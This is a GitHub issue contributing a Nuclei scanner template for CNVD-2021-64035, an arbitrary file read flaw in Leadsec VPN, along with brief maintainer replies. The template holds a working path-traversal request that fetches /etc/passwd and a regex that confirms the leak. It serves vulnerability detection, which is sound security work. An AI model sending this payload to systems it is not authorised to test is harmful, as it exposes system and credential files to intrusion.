Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CNVD-2021-64035 Leadsec VPN Arbitrary File Read #10211

Closed
xiaoWangSec opened this issue Jul 5, 2024 · 2 comments · Fixed by #10219
Closed

CNVD-2021-64035 Leadsec VPN Arbitrary File Read #10211

xiaoWangSec opened this issue Jul 5, 2024 · 2 comments · Fixed by #10219
Assignees
@DhiyaneshGeek
Labels
Done Ready to merge nuclei-template Nuclei template contribution

Comments

@xiaoWangSec
Copy link

Template Information:

There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.
Reference : CNVD-2021-64035
AVD-2021-888761

Nuclei Template:

id: CNVD-2021-64035

info:
  author: xiaoWangSec
  name: Leadsec VPN Arbitrary File Read
  severity: high
  description: There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.

http:
  - method: GET
    path:
      - "{{BaseURL}}/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
@xiaoWangSec xiaoWangSec added the nuclei-template Nuclei template contribution label Jul 5, 2024
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jul 8, 2024
@DhiyaneshGeek DhiyaneshGeek linked a pull request Jul 8, 2024 that will close this issue
Create CNVD-2021-64035.yaml #10219
Merged
2 tasks
@DhiyaneshGeek
Copy link
Member

Hi @xiaoWangSec

Thanks for sharing this template and contributing to the template project

i have raised a PR #10219 , let me know if it looks good

Thanks
@xiaoWangSec
Copy link
Author

Hello, @DhiyaneshGeek
Thanks, it is works.
And thank you very much for adding to the script, which also helped me to learn the relevant syntax, thanks again.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Done Ready to merge nuclei-template Nuclei template contribution
2 participants
@DhiyaneshGeek @xiaoWangSec